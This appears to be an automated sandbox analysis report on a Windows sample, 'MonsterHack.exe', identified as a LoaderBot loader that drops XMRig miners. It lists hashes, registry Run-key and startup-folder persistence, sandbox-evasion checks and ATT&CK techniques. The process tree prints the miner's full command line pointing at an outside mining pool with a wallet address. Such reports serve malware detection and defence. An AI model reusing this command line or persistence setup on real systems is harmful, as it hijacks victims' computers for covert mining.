loaderbot | 6fad65e07016e5e124331e2fa805da27ffd2498fc4b3a622d1f5c8ca5fd72a00

Analysis

max time kernel
150s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
23-06-2024 11:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MonsterHack.exe
Size

4.0MB
MD5

6efea760737c914276321712b7c5faf0
SHA1

cac227707c574deba24c71c85e64e0da1e246b11
SHA256

6952e0e1fc7847b46473a9f22ba352a06623f966e08bb6f79a8b189a117e1510
SHA512

f60077d79a205a78ca86dbd32072604298e2df14dbbc96c94561765289aaeb79123b5fe747e9dcda8289682c57805b9449c67f21f10f4b2453abf09b0ac88561
SSDEEP

49152:5NDFFPJu8fBsVE6ij+RNg+UKpBvtqB3m1RC3:vzP88fBsnZTgOtqB3m1RC3

Score

10^/10

loaderbot xmrig loader miner persistence

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

LoaderBot executable 1 IoCs

resource	yara_rule
behavioral2/memory/4172-1-0x00000000002A0000-0x000000000069E000-memory.dmp	loaderbot

XMRig Miner payload 8 IoCs

miner

resource	yara_rule
behavioral2/memory/2940-18-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/932-22-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2332-38-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2052-45-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2052-46-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2052-47-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2052-48-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/2052-49-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	MonsterHack.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\driver.url	taskmgr.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	MonsterHack.exe

Executes dropped EXE 4 IoCs

pid	Process
2940	Driver.exe
932	Driver.exe
2332	Driver.exe
2052	Driver.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\MonsterHack.exe"	MonsterHack.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	taskmgr.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe
4172	MonsterHack.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
4172	MonsterHack.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeDebugPrivilege	4172	MonsterHack.exe
Token: SeLockMemoryPrivilege	2940	Driver.exe
Token: SeLockMemoryPrivilege	2940	Driver.exe
Token: SeLockMemoryPrivilege	2332	Driver.exe
Token: SeLockMemoryPrivilege	2332	Driver.exe
Token: SeDebugPrivilege	4652	taskmgr.exe
Token: SeSystemProfilePrivilege	4652	taskmgr.exe
Token: SeCreateGlobalPrivilege	4652	taskmgr.exe
Token: 33	4652	taskmgr.exe
Token: SeIncBasePriorityPrivilege	4652	taskmgr.exe
Token: SeLockMemoryPrivilege	2052	Driver.exe
Token: SeLockMemoryPrivilege	2052	Driver.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe
4652	taskmgr.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4172 wrote to memory of 2940	4172	MonsterHack.exe	82
PID 4172 wrote to memory of 2940	4172	MonsterHack.exe	82
PID 4172 wrote to memory of 932	4172	MonsterHack.exe	87
PID 4172 wrote to memory of 932	4172	MonsterHack.exe	87
PID 4172 wrote to memory of 2332	4172	MonsterHack.exe	91
PID 4172 wrote to memory of 2332	4172	MonsterHack.exe	91
PID 4172 wrote to memory of 2052	4172	MonsterHack.exe	101
PID 4172 wrote to memory of 2052	4172	MonsterHack.exe	101

C:\Users\Admin\AppData\Local\Temp\MonsterHack.exe
"C:\Users\Admin\AppData\Local\Temp\MonsterHack.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4172
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2940
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  PID:932
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2332
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2052

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Drops startup file
- Checks SCSI registry key(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4652

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url

Filesize
177B

MD5
0473c18c4bc6cfc88f19ff1061cece56

SHA1
be986ef447d98e159ee859873a819e2ee06e3496

SHA256
1e5612f63f74dab7254a065d622a84c5460d9367dcdce5d5be0fe6845fa6b30c

SHA512
0da901255204e68da702194ade25c84079fcdda5bc9ae9bd320fd8f85efd9052a467b9ecca70eb46cb378cba1916296de0ce783ca9050fab2eef1bb6e37d5989

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
memory/932-22-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2052-49-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2052-48-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2052-47-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2052-46-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2052-45-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2332-38-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2940-18-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2940-15-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2940-17-0x0000000001FC0000-0x0000000001FD4000-memory.dmp

Filesize
80KB

Download
memory/4172-39-0x0000000074D3E000-0x0000000074D3F000-memory.dmp

Filesize
4KB

Download
memory/4172-1-0x00000000002A0000-0x000000000069E000-memory.dmp

Filesize
4.0MB

Download
memory/4172-4-0x0000000005230000-0x0000000005296000-memory.dmp

Filesize
408KB

Download
memory/4172-5-0x0000000074D30000-0x00000000754E0000-memory.dmp

Filesize
7.7MB

Download
memory/4172-41-0x0000000074D30000-0x00000000754E0000-memory.dmp

Filesize
7.7MB

Download
memory/4172-0-0x0000000074D3E000-0x0000000074D3F000-memory.dmp

Filesize
4KB

Download
memory/4652-35-0x00000177E9DE0000-0x00000177E9DE1000-memory.dmp

Filesize
4KB

Download
memory/4652-26-0x00000177E9DE0000-0x00000177E9DE1000-memory.dmp

Filesize
4KB

Download
memory/4652-31-0x00000177E9DE0000-0x00000177E9DE1000-memory.dmp

Filesize
4KB

Download
memory/4652-32-0x00000177E9DE0000-0x00000177E9DE1000-memory.dmp

Filesize
4KB

Download
memory/4652-33-0x00000177E9DE0000-0x00000177E9DE1000-memory.dmp

Filesize
4KB

Download
memory/4652-34-0x00000177E9DE0000-0x00000177E9DE1000-memory.dmp

Filesize
4KB

Download
memory/4652-25-0x00000177E9DE0000-0x00000177E9DE1000-memory.dmp

Filesize
4KB

Download
memory/4652-36-0x00000177E9DE0000-0x00000177E9DE1000-memory.dmp

Filesize
4KB

Download
memory/4652-37-0x00000177E9DE0000-0x00000177E9DE1000-memory.dmp

Filesize
4KB

Download
memory/4652-27-0x00000177E9DE0000-0x00000177E9DE1000-memory.dmp

Filesize
4KB

Download